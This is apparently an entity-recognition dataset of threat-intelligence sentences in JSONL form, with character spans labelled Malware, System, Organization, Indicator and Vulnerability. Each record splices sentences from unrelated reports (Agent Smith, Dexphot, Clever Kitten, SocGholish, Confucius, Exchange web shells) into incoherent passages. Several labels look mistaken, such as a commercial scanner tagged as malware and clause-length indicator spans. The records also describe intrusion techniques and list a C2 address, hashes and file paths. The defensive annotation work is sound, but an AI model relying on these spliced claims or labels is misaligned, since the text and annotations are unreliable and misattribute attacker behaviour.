{"text": "Then , a request is formed in such a way that an activity that installs the application is called , bypassing all security checks . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on . The decryption process involves ADD and XOR operations , using a key hardcoded in the binary . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": [{"start": 193, "end": 201, "label": "System"}, {"start": 230, "end": 260, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 449, "end": 459, "label": "Organization"}]}
{"text": "Figure 10 : The algorithm of the malicious update , while \u201c Agent Smith \u201d updates application If all that has failed , \u201c Agent Smith \u201d turns to Man-in-the-Disk vulnerability for \u2018 SHAREit \u2019 or \u2018 Xender \u2019 applications . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . The decrypted data contains three executables . There are different installation flows for this campaign , but we will focus on the one that uses a URL shortcut .", "spans": [{"start": 60, "end": 71, "label": "Malware"}, {"start": 121, "end": 132, "label": "Malware"}, {"start": 144, "end": 159, "label": "Vulnerability"}, {"start": 180, "end": 187, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 247, "end": 261, "label": "Malware"}, {"start": 283, "end": 309, "label": "Organization"}, {"start": 324, "end": 331, "label": "Organization"}, {"start": 350, "end": 371, "label": "Organization"}, {"start": 470, "end": 478, "label": "Organization"}, {"start": 520, "end": 534, "label": "System"}]}
{"text": "This is a very simple process , which is replacing their update file on SD card with its own malicious payload . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Unlike the files described earlier , these executables are never written to the filesystem . The decoy installer ( Install%20Updater%20(V104.25.151)-stable.url ) is an Internet shortcut downloaded from another compromised WordPress site .", "spans": [{"start": 172, "end": 178, "label": "Malware"}, {"start": 183, "end": 208, "label": "Malware"}, {"start": 363, "end": 407, "label": "Indicator"}, {"start": 470, "end": 484, "label": "System"}]}
{"text": "Figure 11 : \u2018 Agent Smith \u2019 uses man-in-disk to install the malicious update Technical Analysis \u2013 Boot Module The \u201c boot \u201d module is basically another \u201c loader \u201d module , but this time it \u2019 s executed in the infected application . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 33, "end": 44, "label": "Vulnerability"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 380, "end": 387, "label": "Malware"}, {"start": 446, "end": 463, "label": "System"}, {"start": 466, "end": 556, "label": "Indicator"}, {"start": 562, "end": 577, "label": "System"}, {"start": 580, "end": 698, "label": "Malware"}, {"start": 701, "end": 715, "label": "Malware"}]}
{"text": "The purpose of this module is to extract and execute a malicious payload \u2013 the \u201c patch \u201d module . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . Process hollowing is a technique that can hide malware within a legitimate system process . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": [{"start": 128, "end": 139, "label": "System"}, {"start": 202, "end": 219, "label": "System"}, {"start": 294, "end": 313, "label": "Organization"}, {"start": 375, "end": 389, "label": "Malware"}, {"start": 390, "end": 492, "label": "Indicator"}]}
{"text": "The infected application contains its payload inside the DEX file . These sub-domains simulate sub-sections of the main newspapers in Spain plus some international ones like the Guardian and the Washington Post . It replaces the contents of the legitimate process with malicious code . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": [{"start": 120, "end": 130, "label": "Organization"}, {"start": 195, "end": 210, "label": "Organization"}, {"start": 328, "end": 388, "label": "Indicator"}]}
{"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": [{"start": 118, "end": 131, "label": "Vulnerability"}, {"start": 268, "end": 285, "label": "System"}, {"start": 423, "end": 437, "label": "System"}, {"start": 441, "end": 456, "label": "Indicator"}]}
{"text": "Figure 12 : Boot module After the patch module is extracted , the \u201c boot \u201d module executes it , using the same method described in the \u201c loader \u201d module . In other words , the attackers attracted our attention by attempting to exploit Kaspersky Lab products . This method has the additional benefit of being fileless : the code can be run without actually being saved on the file system . Fake browser updates are a very common decoy used by malware authors .", "spans": [{"start": 235, "end": 257, "label": "System"}, {"start": 389, "end": 409, "label": "Malware"}, {"start": 442, "end": 457, "label": "Organization"}]}
{"text": "The \u201c boot \u201d module has placeholder classes for the entry points of the infected applications . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Not only is it harder to detect the malicious code while it \u2019s running , it \u2019s harder to find useful forensics after the process has stopped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": [{"start": 125, "end": 131, "label": "Malware"}, {"start": 409, "end": 419, "label": "Organization"}, {"start": 426, "end": 439, "label": "Malware"}, {"start": 522, "end": 533, "label": "Organization"}, {"start": 542, "end": 553, "label": "System"}, {"start": 569, "end": 583, "label": "Malware"}]}
{"text": "This allows the \u201c boot \u201d module to execute the payloads when the infected application is started . Most modules were created in 2012 . To initiate process hollowing , the loader DLL E-TOOL targets two legitimate system processes , for example svchost.exe or nslookup.exe , and spawns them in a suspended state . Initial access brokers use tools like NetSupport RAT to gather information and perform additional actions on victims of interest .", "spans": [{"start": 147, "end": 164, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 178, "end": 188, "label": "System"}, {"start": 243, "end": 254, "label": "Indicator"}, {"start": 258, "end": 270, "label": "Indicator"}, {"start": 350, "end": 364, "label": "Malware"}]}
{"text": "Figure 13 : placeholder classes in Boot module Technical Analysis \u2013 Patch Module When \u201c Agent Smith \u201d has reached its goal \u2013 a malicious payload running inside the original application , with hooks on various methods \u2013 at this point , everything lies with maintaining the required code in case of an update for the original application . The attackers began taking them offline in January 2014 . The loader DLL E-TOOL replaces the contents of these processes with the first and second decrypted executables . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": [{"start": 88, "end": 99, "label": "Malware"}, {"start": 396, "end": 406, "label": "System"}, {"start": 407, "end": 417, "label": "System"}, {"start": 573, "end": 589, "label": "Organization"}]}
{"text": "While investing a lot of resources in the development of this malware , the actor behind \u201c Agent Smith \u201d does not want a real update to remove all of the changes made , so here is where the \u201c patch \u201d module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names . These executables are monitoring services for maintaining Dexphot \u2019s components . While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": [{"start": 91, "end": 102, "label": "Malware"}, {"start": 441, "end": 455, "label": "Organization"}, {"start": 530, "end": 548, "label": "Organization"}, {"start": 632, "end": 639, "label": "Malware"}]}
{"text": "Another trick in \u201c Agent Smith \u2019 s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology . The now-malicious processes are released from suspension and run . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 19, "end": 30, "label": "Malware"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 359, "end": 379, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]}
{"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down . Next , the loader DLL E-TOOL targets the setup.exe file in SysWoW64 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 363, "end": 373, "label": "System"}, {"start": 374, "end": 384, "label": "System"}, {"start": 397, "end": 406, "label": "Indicator"}, {"start": 415, "end": 423, "label": "System"}, {"start": 426, "end": 438, "label": "Organization"}]}
{"text": "In the injected payload , the module implements the method \u2018 callActivityOnCreate \u2019 . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup.exe \u2019s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 243, "end": 252, "label": "Indicator"}, {"start": 346, "end": 370, "label": "Organization"}]}
{"text": "At any time an infected application will create an activity , this method will be called , and call \u2018 requestAd \u2019 from \u201c Agent Smith \u2019 s code . Clever Kitten has moved to leveraging strategic web compromises . Although Dexphot always uses a cryptocurrency miner of some kind , it \u2019s not always the same miner . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": [{"start": 121, "end": 132, "label": "Malware"}, {"start": 144, "end": 157, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 339, "end": 363, "label": "Organization"}, {"start": 404, "end": 429, "label": "System"}]}
{"text": "\u201c Agent Smith \u201d will replace the original application \u2019 s activities with an in-house SDK \u2019 s activity , which will show the banner received from the server . Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering . It used different programs like XMRig and JCE Miner over the course of our research . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 382, "end": 400, "label": "Organization"}, {"start": 435, "end": 440, "label": "Malware"}, {"start": 445, "end": 454, "label": "Malware"}]}
{"text": "In the case of the infected application not specified in the code , \u201c Agent Smith \u201d will simply show ads on the activity being loaded . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests . The two monitoring services simultaneously check the status of all three malicious processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": [{"start": 70, "end": 81, "label": "Malware"}, {"start": 136, "end": 149, "label": "Organization"}, {"start": 392, "end": 537, "label": "Indicator"}]}
{"text": "Figure 16 : integrating an in-house ad SDK Figure 17 : replacing original app activities with the malicious ad SDK activity Figure 18 : the malware showing ads on any activity being loaded Connecting the Dots As our malware sample analysis took the team closer to reveal the \u201c Agent Smith \u201d campaign in its entirety and it is here that the C & C server investigation enters the center stage . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance . Having dual monitoring services provides redundancy in case one of the monitoring processes is halted . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server \u2019s Unified Messaging Service .", "spans": [{"start": 395, "end": 408, "label": "Organization"}, {"start": 441, "end": 466, "label": "System"}, {"start": 613, "end": 675, "label": "Indicator"}, {"start": 706, "end": 750, "label": "System"}]}
{"text": "We started with most frequently used C & C domains \u201c a * * * d.com \u201d , \u201c a * * * d.net \u201d , and \u201c a * * * d.org \u201d . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device . In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": [{"start": 53, "end": 66, "label": "Indicator"}, {"start": 73, "end": 86, "label": "Indicator"}, {"start": 97, "end": 110, "label": "Indicator"}, {"start": 149, "end": 183, "label": "Malware"}, {"start": 511, "end": 519, "label": "System"}]}
{"text": "Among multiple sub-domains , \u201c ad.a * * * d.org \u201d and \u201c gd.a * * * d.org \u201d both historically resolved to the same suspicious IP address . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly . In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": [{"start": 31, "end": 47, "label": "Indicator"}, {"start": 56, "end": 72, "label": "Indicator"}, {"start": 324, "end": 331, "label": "Indicator"}, {"start": 412, "end": 436, "label": "Organization"}]}
{"text": "The reverse DNS history of this IP brought \u201c ads.i * * * e.com \u201d into our attention . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) . As a final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks . We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": [{"start": 45, "end": 62, "label": "Indicator"}, {"start": 373, "end": 385, "label": "Indicator"}, {"start": 482, "end": 507, "label": "Organization"}]}
{"text": "An extended malware hunting process returned to us a large set of \u201c Agent Smith \u201d dropper variants which helped us further deduce a relation among multiple C & C server infrastructures . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . This persistence technique is interesting , because it employs two distinct MITRE ATT&CK techniques : Scheduled Task and Signed Binary Proxy Execution . On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": [{"start": 68, "end": 79, "label": "Malware"}, {"start": 390, "end": 402, "label": "System"}, {"start": 416, "end": 430, "label": "System"}, {"start": 435, "end": 464, "label": "System"}, {"start": 487, "end": 496, "label": "Organization"}, {"start": 532, "end": 567, "label": "Vulnerability"}, {"start": 609, "end": 634, "label": "System"}]}
{"text": "In a different period of the \u201c Agent Smith \u201d campaign , droppers and core modules used various combinations of the \u201c a * * * d \u201d and \u201c i * * * e \u201d domains for malicious operations such as prey list query , patch request and ads request . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation . Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 431, "end": 442, "label": "Indicator"}, {"start": 496, "end": 507, "label": "Indicator"}, {"start": 539, "end": 548, "label": "Organization"}, {"start": 571, "end": 586, "label": "System"}, {"start": 656, "end": 665, "label": "Organization"}]}
{"text": "With a bit of luck , we managed to find logs in which the evidence showed \u201c Agent Smith \u2019 s C & C front end routinely distributes a workload between \u201c w.h * * * g.com \u201d and \u201c tt.a * * * d.net \u201d . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing . Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": [{"start": 76, "end": 87, "label": "Malware"}, {"start": 151, "end": 166, "label": "Indicator"}, {"start": 175, "end": 191, "label": "Indicator"}, {"start": 384, "end": 395, "label": "Indicator"}, {"start": 491, "end": 498, "label": "Organization"}, {"start": 550, "end": 557, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 574, "end": 581, "label": "Organization"}]}
{"text": "An in-depth understanding of the \u201c Agent Smith \u2019 s campaign C & C infrastructure enabled us to reach the conclusion that the owner of \u201c i * * * e.com \u201d , \u201c h * * * g.com \u201d is the group of hackers behind \u201c Agent Smith \u201d . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed . Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run . We recommend following Microsoft \u2019s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 134, "end": 149, "label": "Indicator"}, {"start": 156, "end": 169, "label": "Indicator"}, {"start": 205, "end": 216, "label": "Malware"}, {"start": 552, "end": 559, "label": "Malware"}]}
{"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape \u201c Agent Smith \u201d droppers show a very greedy infection tactic . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host . They automatically update all of Dexphot \u2019s components , both upon system reboot as well as every 90 or 110 minutes while the system is running . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": [{"start": 67, "end": 78, "label": "Malware"}, {"start": 128, "end": 141, "label": "Organization"}, {"start": 367, "end": 374, "label": "Malware"}, {"start": 563, "end": 583, "label": "Organization"}, {"start": 586, "end": 603, "label": "Organization"}, {"start": 608, "end": 618, "label": "Organization"}, {"start": 628, "end": 644, "label": "Organization"}]}
{"text": "It \u2019 s not enough for this malware family to swap just one innocent application with an infected double . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted . Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running . Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": [{"start": 192, "end": 196, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 524, "end": 550, "label": "Organization"}, {"start": 555, "end": 576, "label": "Organization"}]}
{"text": "It does so for each and every app on the device as long as the package names are on its prey list . There are new TTPs used in this attack \u2013 for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog . The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat authors began to use random strings . Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as \u201c HAFNIUM \u201d , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": [{"start": 184, "end": 190, "label": "System"}, {"start": 480, "end": 489, "label": "Organization"}, {"start": 589, "end": 596, "label": "Organization"}, {"start": 642, "end": 670, "label": "Organization"}, {"start": 673, "end": 682, "label": "Organization"}, {"start": 685, "end": 715, "label": "Organization"}, {"start": 722, "end": 733, "label": "Organization"}]}
{"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants . The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\<random>.exe . As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": [{"start": 189, "end": 202, "label": "System"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 408, "end": 419, "label": "Indicator"}, {"start": 481, "end": 503, "label": "Indicator"}, {"start": 551, "end": 563, "label": "Organization"}]}
{"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor . This makes the system process running malicious code a literal moving target . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": [{"start": 310, "end": 325, "label": "Organization"}, {"start": 464, "end": 489, "label": "Organization"}, {"start": 581, "end": 593, "label": "Organization"}]}
{"text": "As an initial attack vector , \u201c Agent Smith \u201d abuses the 9Apps market \u2013 with over 360 different dropper variants . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted . Dexphot exhibits multiple layers of polymorphism across the binaries it distributes . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer \u2019s environment .", "spans": [{"start": 32, "end": 43, "label": "Malware"}, {"start": 57, "end": 62, "label": "System"}, {"start": 201, "end": 214, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 449, "end": 473, "label": "Organization"}, {"start": 483, "end": 587, "label": "Indicator"}]}
{"text": "To maximize profit , variants with \u201c MinSDK \u201d or \u201c OTA \u201d SDK are present to further infect victims with other adware families . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . For example , the MSI package used in the campaign contains different files , as shown in the table below . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": [{"start": 132, "end": 147, "label": "System"}, {"start": 160, "end": 175, "label": "Vulnerability"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 274, "end": 277, "label": "System"}, {"start": 364, "end": 395, "label": "Indicator"}, {"start": 398, "end": 436, "label": "Indicator"}, {"start": 441, "end": 483, "label": "Indicator"}, {"start": 490, "end": 504, "label": "Organization"}, {"start": 513, "end": 524, "label": "Organization"}, {"start": 536, "end": 554, "label": "Organization"}]}
{"text": "The majority of droppers in 9Apps are games , while the rest fall into categories of adult entertainment , media player , photo utilities , and system utilities . The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 . The MSI packages generally include a clean version of unzIP . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server \u2019s Unified Messaging service .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 174, "end": 180, "label": "System"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 312, "end": 315, "label": "System"}, {"start": 362, "end": 367, "label": "System"}, {"start": 472, "end": 526, "label": "System"}]}
{"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The \u201c Agent Smith \u201d campaign is primarily targeted at Indian users , who represent 59 % of the impacted population . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": [{"start": 281, "end": 292, "label": "Malware"}, {"start": 396, "end": 411, "label": "Malware"}, {"start": 462, "end": 473, "label": "Organization"}, {"start": 477, "end": 487, "label": "Organization"}, {"start": 547, "end": 556, "label": "Organization"}, {"start": 599, "end": 602, "label": "Indicator"}, {"start": 751, "end": 767, "label": "Vulnerability"}]}
{"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , \u201c Agent Smith \u201d has a significant impact upon not only developing countries but also some developed countries where GP is readily available . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": [{"start": 32, "end": 43, "label": "System"}, {"start": 76, "end": 87, "label": "Malware"}, {"start": 256, "end": 271, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 355, "end": 370, "label": "Vulnerability"}, {"start": 466, "end": 475, "label": "Organization"}, {"start": 562, "end": 573, "label": "System"}, {"start": 710, "end": 718, "label": "Organization"}, {"start": 758, "end": 783, "label": "System"}]}
{"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others . In addition , the contents of each Loader DLL E-TOOL differs from package to package , as does the encrypted data included in the ZIP file . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": [{"start": 206, "end": 224, "label": "Organization"}, {"start": 229, "end": 240, "label": "Organization"}, {"start": 293, "end": 299, "label": "System"}, {"start": 300, "end": 310, "label": "System"}, {"start": 468, "end": 506, "label": "Indicator"}, {"start": 570, "end": 585, "label": "System"}]}
{"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by \u201c Agent Smith \u201d , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions . Tweety Chat 's Android version can record audio , too . This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": [{"start": 100, "end": 111, "label": "Malware"}, {"start": 217, "end": 224, "label": "System"}, {"start": 323, "end": 338, "label": "System"}, {"start": 411, "end": 418, "label": "System"}, {"start": 430, "end": 441, "label": "System"}, {"start": 465, "end": 477, "label": "Malware"}, {"start": 530, "end": 541, "label": "System"}, {"start": 567, "end": 570, "label": "System"}]}
{"text": "It is a worrying observation . Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . Because of these carefully designed layers of polymorphism , a traditional file-based detection approach wouldn\u2019t be effective against Dexphot . While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": [{"start": 202, "end": 211, "label": "Organization"}, {"start": 352, "end": 359, "label": "Malware"}, {"start": 494, "end": 563, "label": "Indicator"}]}
{"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": [{"start": 17, "end": 22, "label": "Vulnerability"}, {"start": 106, "end": 115, "label": "Organization"}, {"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 303, "end": 317, "label": "Vulnerability"}, {"start": 366, "end": 373, "label": "Malware"}, {"start": 496, "end": 518, "label": "System"}, {"start": 533, "end": 547, "label": "Organization"}, {"start": 619, "end": 649, "label": "Vulnerability"}]}
{"text": "However , in order to block Janus abuse , app developers need to sign their apps with the new scheme so that Android framework security component could conduct integrity checks with enhanced features . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . The URLs used for hosting all follow a similar pattern . This was likely to establish both persistence and secondary access , as in other environments .", "spans": [{"start": 28, "end": 33, "label": "Vulnerability"}, {"start": 109, "end": 116, "label": "System"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 273, "end": 289, "label": "Organization"}]}
{"text": "Figure 25 : infected Android version distribution To further analyze \u201c Agent Smith \u201d \u2019 s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 71, "end": 82, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 293, "end": 309, "label": "Organization"}, {"start": 477, "end": 482, "label": "Indicator"}, {"start": 486, "end": 490, "label": "Indicator"}, {"start": 685, "end": 693, "label": "Organization"}, {"start": 707, "end": 831, "label": "Indicator"}]}
{"text": "App Swap Per Device Avg . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . Many of the URLs listed were in use for an extended period . The file , matches signatures for the tried - and - true China Chopper .", "spans": [{"start": 53, "end": 64, "label": "System"}, {"start": 67, "end": 97, "label": "Malware"}, {"start": 232, "end": 268, "label": "Organization"}]}
{"text": "Droppers Per Device Avg . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets . However , the MSI packages hosted at each URL are frequently changed or updated . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": [{"start": 177, "end": 180, "label": "System"}, {"start": 358, "end": 377, "label": "System"}]}
{"text": "Months Device Remained Infected India 15,230,123 2,017,873,249 2.6 1.7 2.1 Bangladesh 2,539,913 208,026,886 2.4 1.5 2.2 Pakistan 1,686,216 94,296,907 2.4 1.6 2 Indonesia 572,025 67,685,983 2 1.5 2.2 Nepal 469,274 44,961,341 2.4 1.6 2.4 US 302,852 19,327,093 1.7 1.4 1.8 Nigeria 287,167 21,278,498 2.4 1.3 2.3 Hungary 282,826 7,856,064 1.7 1.3 1.7 Saudi Arabia 245,698 18,616,259 2.3 During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications . In addition , every few days more domains are generated to host more payloads . If the system is in a single - system domain , it will execute on the local computer .", "spans": []}
